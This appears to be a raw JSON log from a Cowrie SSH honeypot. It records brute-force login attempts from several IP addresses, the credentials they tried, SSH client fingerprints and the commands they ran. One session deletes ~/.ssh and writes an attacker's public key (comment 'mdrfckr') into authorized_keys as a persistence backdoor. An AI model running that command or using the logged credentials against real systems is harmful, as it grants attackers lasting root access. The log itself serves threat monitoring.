{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:54:49.096232Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:49.791045Z","src_ip":"212.227.125.160","session":"b02930d058d4"}
{"eventid":"cowrie.login.success","username":"root","password":"rich","message":"login attempt [root/rich] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:54:49.967181Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:54:50.402918Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:54:50.403656Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:54:50.404549Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":56976,"dst_ip":"1.2.3.4","dst_port":22,"session":"22d857397f9b","protocol":"ssh","message":"New connection: 170.64.166.123:56976 (1.2.3.4:22) [session: 22d857397f9b]","sensor":"my-vps","timestamp":"2025-08-31T05:54:50.406376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:54:50.407451Z","src_ip":"170.64.166.123","session":"22d857397f9b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:50.613235Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:54:50.681839Z","src_ip":"170.64.166.123","session":"22d857397f9b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:54:51.089079Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:54:51.089859Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:54:51.299755Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:51.300703Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38450,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c0837bc359e","protocol":"ssh","message":"New connection: 212.227.235.229:38450 (1.2.3.4:22) [session: 4c0837bc359e]","sensor":"my-vps","timestamp":"2025-08-31T05:54:51.504124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:54:51.504827Z","src_ip":"212.227.235.229","session":"4c0837bc359e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:54:51.711199Z","src_ip":"212.227.235.229","session":"4c0837bc359e"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"Abc12345","message":"login attempt [jenkins/Abc12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:54:51.819991Z","src_ip":"170.64.166.123","session":"22d857397f9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46938,"dst_ip":"1.2.3.4","dst_port":22,"session":"71c88daf7f16","protocol":"ssh","message":"New connection: 212.227.235.229:46938 (1.2.3.4:22) [session: 71c88daf7f16]","sensor":"my-vps","timestamp":"2025-08-31T05:54:52.066059Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:53.098463Z","src_ip":"170.64.166.123","session":"22d857397f9b"}
{"eventid":"cowrie.session.closed","duration":"22.1","message":"Connection lost after 22.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:14.178129Z","src_ip":"212.227.235.229","session":"71c88daf7f16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53618,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9902164b656","protocol":"ssh","message":"New connection: 212.227.235.229:53618 (1.2.3.4:22) [session: d9902164b656]","sensor":"my-vps","timestamp":"2025-08-31T05:55:19.878700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:55:19.879701Z","src_ip":"212.227.235.229","session":"d9902164b656"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37076,"dst_ip":"1.2.3.4","dst_port":22,"session":"5386bf66b05e","protocol":"ssh","message":"New connection: 212.227.125.160:37076 (1.2.3.4:22) [session: 5386bf66b05e]","sensor":"my-vps","timestamp":"2025-08-31T05:55:20.014520Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:55:20.137163Z","src_ip":"212.227.235.229","session":"d9902164b656"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:55:20.849243Z","src_ip":"212.227.125.160","session":"5386bf66b05e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:55:20.850417Z","src_ip":"212.227.125.160","session":"5386bf66b05e"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1234","message":"login attempt [oracle/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:55:21.979653Z","src_ip":"212.227.235.229","session":"d9902164b656"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:23.239313Z","src_ip":"212.227.235.229","session":"d9902164b656"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53866,"dst_ip":"1.2.3.4","dst_port":22,"session":"642d005ff9f2","protocol":"ssh","message":"New connection: 212.227.235.229:53866 (1.2.3.4:22) [session: 642d005ff9f2]","sensor":"my-vps","timestamp":"2025-08-31T05:55:23.467830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:55:24.361764Z","src_ip":"212.227.235.229","session":"642d005ff9f2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:55:24.362486Z","src_ip":"212.227.235.229","session":"642d005ff9f2"}
{"eventid":"cowrie.login.success","username":"root","password":"235689741bosNYA","message":"login attempt [root/235689741bosNYA] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:55:25.038321Z","src_ip":"212.227.125.160","session":"5386bf66b05e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:55:28.005687Z","src_ip":"212.227.125.160","session":"5386bf66b05e"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T05:55:28.006380Z","src_ip":"212.227.125.160","session":"5386bf66b05e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:29.321673Z","src_ip":"212.227.125.160","session":"5386bf66b05e"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:29.324017Z","src_ip":"212.227.125.160","session":"5386bf66b05e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"7baeb247094f","protocol":"ssh","message":"New connection: 212.227.125.160:51824 (1.2.3.4:22) [session: 7baeb247094f]","sensor":"my-vps","timestamp":"2025-08-31T05:55:29.620571Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:29.688248Z","src_ip":"212.227.125.160","session":"7baeb247094f"}
{"eventid":"cowrie.login.failed","username":"test3","password":"123456","message":"login attempt [test3/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:55:29.900795Z","src_ip":"212.227.235.229","session":"642d005ff9f2"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:31.804815Z","src_ip":"212.227.235.229","session":"642d005ff9f2"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:55:32.848368Z","src_ip":"212.227.125.160","session":"3af575804a52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37598,"dst_ip":"1.2.3.4","dst_port":22,"session":"deaf0e63739f","protocol":"ssh","message":"New connection: 212.227.125.160:37598 (1.2.3.4:22) [session: deaf0e63739f]","sensor":"my-vps","timestamp":"2025-08-31T05:55:35.044191Z"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":55064,"dst_ip":"1.2.3.4","dst_port":22,"session":"96dd56929049","protocol":"ssh","message":"New connection: 201.148.180.50:55064 (1.2.3.4:22) [session: 96dd56929049]","sensor":"my-vps","timestamp":"2025-08-31T05:55:39.184389Z"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":45602,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f4ed3388bad","protocol":"ssh","message":"New connection: 43.159.36.188:45602 (1.2.3.4:22) [session: 2f4ed3388bad]","sensor":"my-vps","timestamp":"2025-08-31T05:55:39.634332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:55:39.635350Z","src_ip":"43.159.36.188","session":"2f4ed3388bad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:55:39.898788Z","src_ip":"43.159.36.188","session":"2f4ed3388bad"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:55:40.068737Z","src_ip":"201.148.180.50","session":"96dd56929049"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:55:40.069460Z","src_ip":"201.148.180.50","session":"96dd56929049"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"123456","message":"login attempt [esadmin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:55:40.993923Z","src_ip":"43.159.36.188","session":"2f4ed3388bad"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:42.259957Z","src_ip":"43.159.36.188","session":"2f4ed3388bad"}
{"eventid":"cowrie.session.closed","duration":"66.6","message":"Connection lost after 66.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:55:44.014069Z","src_ip":"212.227.125.160","session":"3af575804a52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43840,"dst_ip":"1.2.3.4","dst_port":22,"session":"c09af2856625","protocol":"ssh","message":"New connection: 212.227.125.160:43840 (1.2.3.4:22) [session: c09af2856625]","sensor":"my-vps","timestamp":"2025-08-31T05:55:44.386097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:55:44.852807Z","src_ip":"212.227.125.160","session":"c09af2856625"}
